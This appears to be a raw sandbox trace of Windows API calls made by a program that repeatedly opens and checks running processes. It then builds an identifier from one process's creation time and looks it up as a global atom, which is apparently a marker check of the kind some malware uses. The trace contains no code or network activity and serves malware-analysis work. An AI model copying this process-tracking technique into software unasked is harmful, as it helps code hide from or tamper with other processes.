	[0095.755] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0095.755] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x248
	[0095.755] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.755] CloseHandle (hObject=0x248) returned 1
	[0095.755] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0095.756] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x248
	[0095.756] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.756] CloseHandle (hObject=0x248) returned 1
	[0095.756] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x248
	[0095.756] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.756] CloseHandle (hObject=0x248) returned 1
	[0095.756] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x248
	[0095.756] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.756] CloseHandle (hObject=0x248) returned 1
	[0095.756] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x248
	[0095.756] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.756] CloseHandle (hObject=0x248) returned 1
	[0095.756] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x248
	[0095.756] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.756] CloseHandle (hObject=0x248) returned 1
	[0095.757] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x248
	[0095.757] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.757] CloseHandle (hObject=0x248) returned 1
	[0095.757] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0095.757] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x248
	[0095.757] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.757] CloseHandle (hObject=0x248) returned 1
	[0095.757] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x248
	[0095.757] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.757] CloseHandle (hObject=0x248) returned 1
	[0095.757] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x248
	[0095.757] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.757] CloseHandle (hObject=0x248) returned 1
	[0095.757] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x248
	[0095.758] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.758] CloseHandle (hObject=0x248) returned 1
	[0095.758] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x248
	[0095.758] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.758] CloseHandle (hObject=0x248) returned 1
	[0095.758] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x248
	[0095.758] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.758] CloseHandle (hObject=0x248) returned 1
	[0095.758] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x248
	[0095.758] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.758] CloseHandle (hObject=0x248) returned 1
	[0095.758] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x248
	[0095.758] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.758] CloseHandle (hObject=0x248) returned 1
	[0095.758] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x248
	[0095.758] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.758] CloseHandle (hObject=0x248) returned 1
	[0095.759] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x248
	[0095.759] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.759] CloseHandle (hObject=0x248) returned 1
	[0095.759] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x248
	[0095.759] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.759] CloseHandle (hObject=0x248) returned 1
	[0095.759] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x248
	[0095.759] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.759] CloseHandle (hObject=0x248) returned 1
	[0095.759] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x248
	[0095.759] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.759] CloseHandle (hObject=0x248) returned 1
	[0095.759] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x248
	[0095.759] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.760] CloseHandle (hObject=0x248) returned 1
	[0095.760] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x248
	[0095.760] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.760] CloseHandle (hObject=0x248) returned 1
	[0095.760] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x248
	[0095.760] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.760] CloseHandle (hObject=0x248) returned 1
	[0095.760] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x248
	[0095.760] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.760] CloseHandle (hObject=0x248) returned 1
	[0095.760] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x248
	[0095.760] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.760] CloseHandle (hObject=0x248) returned 1
	[0095.760] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x248
	[0095.760] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.760] CloseHandle (hObject=0x248) returned 1
	[0095.761] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x248
	[0095.761] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.761] CloseHandle (hObject=0x248) returned 1
	[0095.761] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x248
	[0095.761] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.761] CloseHandle (hObject=0x248) returned 1
	[0095.761] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x248
	[0095.761] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.761] CloseHandle (hObject=0x248) returned 1
	[0095.761] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x248
	[0095.761] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.761] CloseHandle (hObject=0x248) returned 1
	[0095.761] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x248
	[0095.762] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0095.762] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0095.762] GetProcessTimes (in: hProcess=0x248, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0095.762] wsprintfA (in: param_1=0x6488a8, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0095.762] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0095.762] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0095.763] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0095.763] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0095.763] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0095.763] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0095.763] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0095.763] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0095.763] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x248
	[0095.763] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.763] CloseHandle (hObject=0x248) returned 1
	[0095.763] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x248
	[0095.763] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.763] CloseHandle (hObject=0x248) returned 1
	[0095.834] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0095.835] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0095.835] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0095.835] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0095.835] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0095.835] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0095.835] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0095.835] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0095.836] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0095.836] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0095.836] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0095.836] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0095.836] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0095.836] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0095.836] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0095.836] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0095.836] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0095.837] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0095.837] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x248
	[0095.837] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.837] CloseHandle (hObject=0x248) returned 1
	[0095.837] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0095.837] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0095.837] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x248
	[0095.837] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.837] CloseHandle (hObject=0x248) returned 1
	[0095.837] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0095.838] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x248
	[0095.838] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.838] CloseHandle (hObject=0x248) returned 1
	[0095.838] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x248
	[0095.838] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.838] CloseHandle (hObject=0x248) returned 1
	[0095.838] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x248
	[0095.838] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.838] CloseHandle (hObject=0x248) returned 1
	[0095.838] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x248
	[0095.838] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.838] CloseHandle (hObject=0x248) returned 1
	[0095.838] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x248
	[0095.838] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.838] CloseHandle (hObject=0x248) returned 1
	[0095.839] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x248
	[0095.839] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.839] CloseHandle (hObject=0x248) returned 1
	[0095.839] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0095.839] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x248
	[0095.839] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.839] CloseHandle (hObject=0x248) returned 1
	[0095.839] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc50) returned 0x248
	[0095.839] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.839] CloseHandle (hObject=0x248) returned 1
	[0095.839] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xd80) returned 0x248
	[0095.839] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.839] CloseHandle (hObject=0x248) returned 1
	[0095.839] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe90) returned 0x248
	[0095.839] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.839] CloseHandle (hObject=0x248) returned 1
	[0095.840] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xea4) returned 0x248
	[0095.840] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.840] CloseHandle (hObject=0x248) returned 1
	[0095.840] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xeb8) returned 0x248
	[0095.840] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.840] CloseHandle (hObject=0x248) returned 1
	[0095.840] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xecc) returned 0x248
	[0095.840] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.840] CloseHandle (hObject=0x248) returned 1
	[0095.840] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xee0) returned 0x248
	[0095.840] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.840] CloseHandle (hObject=0x248) returned 1
	[0095.840] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xef4) returned 0x248
	[0095.840] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.840] CloseHandle (hObject=0x248) returned 1
	[0095.841] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf08) returned 0x248
	[0095.841] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.841] CloseHandle (hObject=0x248) returned 1
	[0095.841] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf24) returned 0x248
	[0095.841] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.841] CloseHandle (hObject=0x248) returned 1
	[0095.841] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf44) returned 0x248
	[0095.841] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.841] CloseHandle (hObject=0x248) returned 1
	[0095.841] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf60) returned 0x248
	[0095.841] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.841] CloseHandle (hObject=0x248) returned 1
	[0095.841] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf78) returned 0x248
	[0095.841] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.841] CloseHandle (hObject=0x248) returned 1
	[0095.842] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xf8c) returned 0x248
	[0095.842] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.842] CloseHandle (hObject=0x248) returned 1
	[0095.842] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfac) returned 0x248
	[0095.842] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.842] CloseHandle (hObject=0x248) returned 1
	[0095.842] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc0) returned 0x248
	[0095.842] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.842] CloseHandle (hObject=0x248) returned 1
	[0095.842] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfe4) returned 0x248
	[0095.842] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.842] CloseHandle (hObject=0x248) returned 1
	[0095.842] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc14) returned 0x248
	[0095.842] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.842] CloseHandle (hObject=0x248) returned 1
	[0095.843] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc1c) returned 0x248
	[0095.843] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.843] CloseHandle (hObject=0x248) returned 1
	[0095.843] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x514) returned 0x248
	[0095.843] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.843] CloseHandle (hObject=0x248) returned 1
	[0095.843] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc28) returned 0x248
	[0095.843] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.843] CloseHandle (hObject=0x248) returned 1
	[0095.843] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x248
	[0095.843] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.843] CloseHandle (hObject=0x248) returned 1
	[0095.843] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xc3c) returned 0x248
	[0095.844] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0095.844] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0095.844] GetProcessTimes (in: hProcess=0x248, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0095.844] wsprintfA (in: param_1=0x6488a8, param_2="%d-%08x-%08x" | out: param_1="3132-01d492ec-3643cc1f") returned 22
	[0095.844] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0095.844] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0095.844] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0095.845] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0095.845] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0095.845] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0095.845] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xbf0) returned 0x0
	[0095.845] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0095.845] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x30c) returned 0x248
	[0095.845] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.845] CloseHandle (hObject=0x248) returned 1
	[0095.845] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xdd4) returned 0x248
	[0095.845] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.845] CloseHandle (hObject=0x248) returned 1
	[0095.910] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xfc) returned 0x0
	[0095.910] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x144) returned 0x0
	[0095.911] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x18c) returned 0x0
	[0095.911] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x198) returned 0x0
	[0095.911] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0
	[0095.911] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f0) returned 0x0
	[0095.911] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1f8) returned 0x0
	[0095.911] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0
	[0095.911] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x268) returned 0x0
	[0095.911] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0
	[0095.912] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x324) returned 0x0
	[0095.912] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x34c) returned 0x0
	[0095.912] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x35c) returned 0x0
	[0095.912] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3a0) returned 0x0
	[0095.912] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3c0) returned 0x0
	[0095.912] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3d4) returned 0x0
	[0095.912] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xe4) returned 0x0
	[0095.912] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x460) returned 0x0
	[0095.913] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x50c) returned 0x248
	[0095.913] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.913] CloseHandle (hObject=0x248) returned 1
	[0095.913] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x600) returned 0x0
	[0095.913] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x650) returned 0x0
	[0095.913] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6e4) returned 0x248
	[0095.913] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.913] CloseHandle (hObject=0x248) returned 1
	[0095.913] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x6d4) returned 0x0
	[0095.913] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x700) returned 0x248
	[0095.913] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.914] CloseHandle (hObject=0x248) returned 1
	[0095.914] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x84c) returned 0x248
	[0095.914] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.914] CloseHandle (hObject=0x248) returned 1
	[0095.914] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x894) returned 0x248
	[0095.914] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.914] CloseHandle (hObject=0x248) returned 1
	[0095.914] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x9cc) returned 0x248
	[0095.914] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.914] CloseHandle (hObject=0x248) returned 1
	[0095.914] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xa38) returned 0x248
	[0095.914] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.914] CloseHandle (hObject=0x248) returned 1
	[0095.914] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xae0) returned 0x248
	[0095.914] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0095.914] CloseHandle (hObject=0x248) returned 1
	[0095.915] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x924) returned 0x0
	[0095.915] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x310) returned 0x248
	[0095.915] IsWow64Process (in: hProcess=0x248, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
